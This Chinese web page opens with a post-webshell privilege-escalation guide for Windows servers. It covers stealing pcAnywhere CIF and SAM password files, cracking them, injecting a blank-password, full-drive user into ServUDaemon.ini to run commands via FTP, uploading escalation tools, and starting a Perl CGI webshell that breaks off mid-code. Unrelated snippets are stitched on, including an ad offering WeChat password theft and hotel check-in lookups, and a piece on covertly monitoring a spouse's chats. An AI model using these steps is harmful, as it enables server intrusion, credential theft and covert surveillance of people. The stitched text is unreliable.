当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就更好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
c:\winnt\repaire 下是备份
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=dede|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有更高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
图片来自网络...
自从类似于微信这样的APP存留在我们生活之后,就会发现我们对于这些记录时间没有那么在意了,可能是年纪一天比一天大了吧?对于一些小细节也没有多么在乎。但是大家有没有想过,如果有一天我们想翻一翻自己曾经做...
如今,各种网站都要求用户在使用相应的资源和服务之前注册自己的账户。出于方面考虑,许多人习惯于在本地浏览器中选择记住密码。可以在不重复输入帐户密码的情况下完成下一次登录。同时,这也带来了安全风险,让我们...
恢复精灵教你如何看微信聊天记录内容 专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!我在2011年和微信有过联系,当时微信的功能很简单,随着无线支付功能的普及,我有越来越多的朋友...
为什么越来越多的人喜欢去使用这一款APP里面的微信公众号这个功能了呢?其实在刚开始的时候,这一款功能并没有受到这么多人的喜欢,而且它的使用人数也是只降没有升高的一种状况,而且还受到各种各样的新应用的冲...
我想监控我老婆的微信,微信有利有弊,一方面极大的改变着我们的生活,为生活提供便利;另一方面也加剧了某些人群的矛盾,想要同步老婆的微信聊天记录来解除内心的猜忌。但是我们如何才可以同步到对方的聊天,以下几...